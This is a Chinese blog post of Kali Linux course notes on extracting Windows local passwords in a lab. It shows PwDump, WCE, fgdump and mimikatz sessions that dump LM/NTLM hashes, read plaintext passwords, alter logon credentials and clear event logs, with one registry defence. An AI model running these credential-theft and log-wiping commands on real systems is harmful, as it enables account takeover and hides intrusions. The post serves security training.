Kali Linux渗透测试 045 读取windows本地密码

最新推荐文章于 2024-03-21 20:54:24 发布
最新推荐文章于 2024-03-21 20:54:24 发布
阅读量2.5k 收藏 2
点赞数
分类专栏: kali-linux 文章标签: kali-linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Kevinhanser/article/details/79407338
版权

本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程

  1. 抓包嗅探
  2. 键盘记录本地密码
  3. 查看本地缓存密码
  4. WCE (WINDOWS CREDENTIAL EDITOR)
  5. fgdump
  6. mimikatz

###1. 抓包嗅探###

  1. Windows

    • Wireshark
    • Omnipeek
    • Commview
    • Sniffpass:抓取密码相关的数据包

  2. Linux

    • Tcpdump
    • Wireshark
    • Dsniff:抓取密码相关的数据包

###2. 键盘记录本地密码###

  • 可以使用木马软件 DarkCometRAT

    在控制目标主机之后可以监控键盘记录信息

###3. 查看本地缓存密码###

  1. 在浏览器查看缓存密码

    在这里插入图片描述

  2. windows 密码恢复工具

    Windows Password Recovery Tools

  3. 使用 Pwdump 查看 windows 本地登录密码

    • windows 登录密码保存在 C:\Windows\System32\config\SAM 文件中

    • Pwdump 在 kali 系统中可以找到 /usr/share/windows-binaries/fgdump/

    • 添加用户

        C:\Documents and Settings\kevin>net user user2 123456 /add
  C:\Documents and Settings\kevin>net user
  	\\ICST-WINATT 的用户帐户
  	-------------------------------------------------------------
  	Administrator            Guest                    HelpAssistant
  	kevin                    SUPPORT_388945a0         test
  	user1                    user2
  C:\Documents and Settings\kevin>cd \
  C:\>PwDump.exe localhost
  	Administrator:500:18D583B495C4696AFF17365FAF1FFE89:5D36F0CA14EEBEF32F55C7B6A4675DB0:::
  	Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:::
  	HelpAssistant:1000:5906F3A72959D5902440275BA555A537:10AA20D63C3EC71E0102AC95ADF6DF73:::
  	kevin:1004:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4:::
  	SUPPORT_388945a0:1002:NO PASSWORD*********************:8AFA81401E8D8EBFA42B4E46F6507C07:::
  	test:1005:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4:::
  	user1:1006:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4:::
  	user2:1007:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4:::Completed.
  # 结果:前部分是 LMHASH ,后部分是 NTLMHASH

    • 可以将结果保存在文件中,然后在 kali 中进行破解

      在这里插入图片描述

###4. WCE (WINDOWS CREDENTIAL EDITOR)###

  1. WINDOWS身份认证过程

    在这里插入图片描述

  2. WCE (WINDOWS CREDENTIAL EDITOR)

    • windows 内核中保存有密码明文副本,安全机制较低

    • 需要管理员权限

    • 工具保持在 kali 的 /usr/share/wce/wce-universal # 通用格式是自动识别32位和64位

    • 多用户登录目标主机

      在这里插入图片描述

    • 列举登录账号及会话

        C:\>wce-universal.exe -lv
  	0020B19D:user1:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
  	001E5D92:user2:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
  	001B9220:test:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
  	0000C7CE:kevin:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
  	000003E4:ICST-WINATT$:MSHOME:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0
  	# 与 C:\>PwDump.exe localhost 结果相同

    • 每隔5秒刷新一次

      C:>wce-universal.exe -r

    • 删除登录会话

        C:\>wce-universal.exe -d 0020B19D
  C:\>wce-universal.exe -lv
  	001E5D92:user2:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
  	001B9220:test:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
  	0000C7CE:kevin:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
  	000003E4:ICST-WINATT$:MSHOME:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0

    • 计算密码对应的 HASH 值

        C:\>wce-universal.exe -g passwd
  	Password:   passwd
  	Hashes:     91C7AE7122196B5EAAD3B435B51404EE:22315D6ED1A7D5F8A7C98C40E9FA2DEC

    • 读取内核中的明文密码

        C:\>wce-universal.exe -w
  	user1\ICST-WINATT:123456
  	user2\ICST-WINATT:123456
  	test\ICST-WINATT:123456
  	kevin\ICST-WINATT:123456
  	NETWORK SERVICE\MSHOME:
  
  C:\>net user user1 111222
  	命令成功完成。
  C:\>wce-universal.exe -w
  	user1\ICST-WINATT:123456
  	user2\ICST-WINATT:123456
  	test\ICST-WINATT:123456
  	kevin\ICST-WINATT:123456
  	NETWORK SERVICE\MSHOME:
  # 当前内核中保存的值会在下次登录被读取出来

    • 对 LUID 进行修改(将LUID改为匹配其他用户的用户名和密码)

        C:\>wce-universal.exe -lv
  	001E5D92:user2:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
  	001B9220:test:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
  	0000C7CE:kevin:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
  	000003E4:ICST-WINATT$:MSHOME:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0
  C:\>wce-universal.exe -i 001E5D92 -s kevin:ICST-	WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
  	Changing NTLM credentials of logon session 001E5D92h to:
  	Username: kevin
  	domain: ICST-WINATT
  	LMHash: 44EFCE164AB921CAAAD3B435B51404EE
  	NTHash: 32ED87BDB5FDC5E9CBA88547376818D4
  	NTLM credentials successfully changed!
  C:\>wce-universal.exe -lv
  	001E5D92:kevin:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
  	001B9220:test:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
  	000003E4:ICST-WINATT$:MSHOME:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0

    • Win7 及 之前默认 都可遭受 WCE 攻击

      防范方法:修改注册表

        HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages

      删除 wdigest 之后重启计算机

      在这里插入图片描述

###5. fgdump ###

  1. PwDump localhost

    位置:Pwdump 在 kali 系统中可以找到 /usr/share/windows-binaries/fgdump/

  2. fgdump

    位置:Pwdump 在 kali 系统中可以找到 /usr/share/windows-binaries/fgdump/
    放在 WinXP 中, 双击或在命令行执行 fgdump.exe 会自动生成三个文件,文件中保存着密码

    在这里插入图片描述

###6. mimikatz ###

  • 在 kali 中的路径 /usr/share/mimikatz,将 win32 复制到 windows 主机

      C:\Win32>mimikatz.exe
  查看帮助是::
  mimikatz # ::
  	        standard  -  Standard module  [Basic commands (does not require module name)]
  	          crypto  -  Crypto Module
  	        sekurlsa  -  SekurLSA module  [Some commands to enumerate credentials...]
  	        kerberos  -  Kerberos package module  []
  	       privilege  -  Privilege module
  	         process  -  Process module
  	         service  -  Service module
  	         lsadump  -  LsaDump module
  	              ts  -  Terminal Server module
  	           event  -  Event module
  	            misc  -  Miscellaneous module
  	           token  -  Token manipulation module
  	           vault  -  Windows Vault/Credential module
  	     minesweeper  -  MineSweeper module
  	             net  -
  	           dpapi  -  DPAPI Module (by API or RAW access)  [Data Protection application programming interface]
  	       busylight  -  BusyLight Module
  	          sysenv  -  System Environment Value module
  	             sid  -  Security Identifiers module
  	             iis  -  IIS XML Config module
  	             rpc  -  RPC control of mimikatz			
  mimikatz # privilege::
  			Module :        privilege
  			Full name :     Privilege module
  	
  	           debug  -  Ask debug privilege            * *
  	          driver  -  Ask load driver privilege
  	        security  -  Ask security privilege
  	             tcb  -  Ask tcb privilege
  	          backup  -  Ask backup privilege
  	         restore  -  Ask restore privilege
  	          sysenv  -  Ask system environment privilege
  	              id  -  Ask a privilege by its id
  	            name  -  Ask a privilege by its name
  mimikatz # privilege::debug
  mimikatz # sekurlsa::
  mimikatz # sekurlsa::logonPasswords
  mimikatz # sekurlsa::wdigest
  mimikatz # process::list
  mimikatz # lsadump::sam
  mimikatz # lsadump::cache
  mimikatz # ts::multirdp
  mimikatz # event::clear
  mimikatz # event::drop
  mimikatz # misc::regedit
  mimikatz # token::whoami
网络安全打工人
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Kali Linux渗透测试高级篇.rar
09-12
Kali Linux 是一款专门用于IT安全评估的Linux操作系统。目前作为被欢迎的Linux操作系统广泛用于安全评估项目中,其中提供600+安全工具,...课程主要内容:学习Kali Linux安全测试使用工具的使用,以及高级技巧的使用
蓝胖子攻击·kail利用msf工具对MS12-020漏洞进行渗透测试·使用XP,kali
weixin_48060069的博客
11-12 397
实验过程 1.安装运行环境 版本:windows:VMware,mac版本:VirtualBox。 2.下载安装XP 2.1在官网上选择相应的版本,并将文件存储在文稿中。 2.2 启动Virtualbox,选择新建 --> 接下来的步骤: A.名称为XP, 32-bit 内存大小:512MB B.选择:现在创建虚拟硬盘 VID 动态分配 10GB C. 点击“设置” > “存储” > “没有盘片” > 点击“分配光驱”右边的光盘图标 > “选择一个
Kali渗透测试:散列密码破解
Liu_Bruce的博客
05-26 3645
Kali渗透测试:散列密码破解 某些网站的安全机制设置有缺陷,导致自身的关键数据库被渗透。很多用户在不同网站使用的是相同的用户名和密码,因此黑客可以通过获取通过获取用户在A网站的用户名和密码从而尝试登录B网站,这就是“撞库攻击”。 如2014年12月25日开始在互联网上“疯传的”12306网站用户信息,就是黑客通过撞库攻击所获得的。 被泄漏的数据库中的数据大都是明文,不过,现在的数据库大都采用了散列加密的方式保存。如Windows操作系统就采用散列加密的方式保存登录密码。这些密码都是经过了散列加密后保存到
利用kali Linux 渗透windows 操作系统
YJlio的博客
03-05 6191
利用kali Linux 渗透windows 操作系统 一、实验目的:使用kali生成木马,渗透windows系统 二、实验内容: 使用kali中的Metasploit生成木马,控制windows系统 三、实验环境 需要从VMware Workstation 中创建两台虚拟机 一台kali linux和一台靶机windows系统 1、攻击者ip(kali) 192.168.63.21 2、靶机ip(windows)192.168.63.20 四、实验步骤 先将虚拟机的网络模式修改为桥接模
kali】28 提权——读取windows本地密码:pwddump、WCE、fgdump、mimikatz
(∪.∪ )...zzz的博客
10-22 3756
这里写自定义目录标题一、 抓包嗅探二、 键盘记录本地密码三、 查看本地缓存密码1. 浏览器查看密码2. 密码恢复工具3. 使用 Pwdump 查看 windows 本地登录密码4. WCE (WINDOWS CREDENTIAL EDITOR)5. fgdump6. mimikatz 一、 抓包嗅探 Windows Wireshark Omnipeek (好多的分析功能 Commview Sniffpass:抓取密码相关的数据包 Linux Tcpdump Wireshark Dsniff:抓取密码
kail linux破解密码--- 详细过程(配合图文让你看了就会)
最新发布
dz131lsq的博客
03-21 850
1.vmware虚拟机2.kali的系统3.无线网卡一张(这个是必须的我买的是30多块4.这里为了实验,和直观的看到效果,用手机开了一个wifi然后使用kali进行破解。
kali渗透Windows
m0_51786204的博客
04-03 1143
我们这里也可以把这个程序伪装一下,把他的图标改一下,或者把它捆绑在某些软件上面,当用户打开就自动安装到对方电脑上面。本地端口自己随便设置一个没有被占用的端口号,如果端口号被占用那么文件会生成失败,换一个端口号就行。解释: 本地ip写自己Kali的IP地址,用ifconfig就能查看自己Kali的IP地址。(3)命令: set LhOST 192.168.32.1(填写自己主机的IP地址)(2)命令: sessions -i 1(选择需要攻击的用户,这里选择第 1 个)可以写个容易让目标主机上钩的名字。
Windows网络服务渗透测试实战-Meterpreter后渗透
c_lanxiaofang的博客
05-17 2588
一、实验项目名称 Windows网络服务渗透测试实战-Meterpreter后渗透 二、实验目的及要求 掌握对MS17-010漏洞攻击的方法。 熟悉Metasploit终端的使用方法。 熟悉通过meterpreter进行后渗透操作 三、复现步骤(附加文字说明加截图) 1、查看系统信息 屏幕快照 上传 下载 密码获取 Administrator:500:aad3b435b51404eeaad3b...
Kali Linux渗透测试技术详解
02-19
介绍了Linux安全透简介、安装及配置KaliLinux 操作系统、配置目标测试系统:第2篇为信息的收集及利用,介绍了信息收集、漏洞扫描、漏洞利用等技术:第3篇为各种渗透测试,介绍了权限提升、密码攻击、无线网络攻击、...
Kali Linux 高级渗透测试(原书第2版)(带详细目录)
06-18
KaliLinux面向专业的渗透测试和安全审计,集成了大量精心挑选的安全检测工具。本书在KaliLinux平台上从一个攻击者的角度来审视网络框架,详细介绍了攻击者“杀链”采取的具体步骤。通过阅读本书读者能快速学习并掌握...
KaliLinux渗透测试五步曲
03-23
TechTarget中国原创】KaliLinux的设计目的是渗透测试。不管渗透测试者的起点是白盒测试、黑盒测试,还是灰盒测试,在用Kali或其它工具进行渗透测试时,总要遵循一些步骤。  KaliLinux的设计目的是渗透测试。不管...
windows密码获取
07-29 2197
概述 渗透测试过程中对于windows 系统中的密码获取是十分重要的一步,获取密码后我们可以对内网中其他机器进行撞库,快速、批量拿下其他服务器权限。 windows密码获取方法 最主流的获取windows 密码的方法最主流的方法有三种,mimikatz 直接执行获取;procdump + mimikatz 进行获取;读取注册表进行获取 + mimikatz 解密进行获取。 使用这三种方式的前提是必须在管理员的权限下进行执行命令,不然执行会失败。 mimikatz直接获取 直接将mimikatz 上传到
Kali利用msf渗透Windows电脑(超详细)
热门推荐
RFZ_322的博客
03-09 4万+
Msfvenom命令总结大全1.实时监控屏幕run vnc -i 2.打开摄像头webcam_snap 用kali入侵别人的电脑,手机,安卓,苹果,mac,linxu系统,渗透到对方电脑然后展开进攻
Windows系统密码
weixin_43404314的博客
02-08 1489
下载文件,用记事本打开内容为 Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: ctf:1002:06af9108f2e1fecf144e2e8adef09efd:a7fcb22a88038f35a8f39d503e7f0062::: Guest:501:aad3b435b...
Windows密码破解
weixin_51846555的博客
07-03 2663
这里主要介绍两种方法来破解Windows的开机密码
利用漏洞永恒之蓝ms17-010对win7目标进行渗透
ABABC1234的博客
07-06 950
使用kali进行渗透总的来说就是三大步骤,即:使用模块=》设置模块=》运行模块以上仅供自己总结使用,但也欢迎大佬们指正存在的错误。在这里提醒每一位网络安全学习者不要利用技术做违法的事情,不然真的会很刑!!!
几款优秀的Windows密码抓取工具
LuckySec
03-24 6385
前言 本篇介绍几款优秀的Windows上的密码抓取工具,每个工具都有自己的特点非常实用,欢迎补充。 0x01 Mimikatz 个人点评:这款工具非常强大,公认的Windows密码神器。 1. 简介 Mimikat是一个法国人写的轻量级调试器。Mimikat可以从内存中提取纯文本密码,hash,PIN码和kerberos票证。mimikatz还可以执行哈希传递,票证传递或构建Golden票证 项目地址:https://github.com/gentilkiwi/mimikatz/ 2. 使用 cmd运行
内网渗透linux&windows密码读取&haschcat破解&ssh&rdp
m0_62207170的博客
05-12 1357
内网渗透linux&windows密码读取&haschcat破解&ssh&rdp
安全模式 提权_WEB安全第八章实战篇01 提权安全狗服务器
weixin_39634438的博客
12-21 320
这篇文章放在内部已经有一万年了。1、简介服务器 (vps)上安装了iis安全狗 服务器安全狗通常这种服务器都是比较难提权 不仅是漏洞补丁修复得差不多,waf 对于常规的提权方法也是拦截得较多。aspx大马 被查杀 拦截 不能访问所以要用内部过waf的 暗月过狗刀 基本过一切waf中国菜刀 一句话 客户端 菜刀发送的包里面包含eval特征会被waf拦截,服务端一句话一般都会拦截。除了做了一...
kali linux渗透测试靶机
02-23
Kali Linux提供了多种渗透测试靶机,用于练习和测试渗透测试技术。这些靶机模拟了真实世界中的各种漏洞和攻击场景,帮助安全专业人员熟悉和理解不同类型的漏洞,并学习如何利用它们。 以下是一些常见的Kali Linux...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值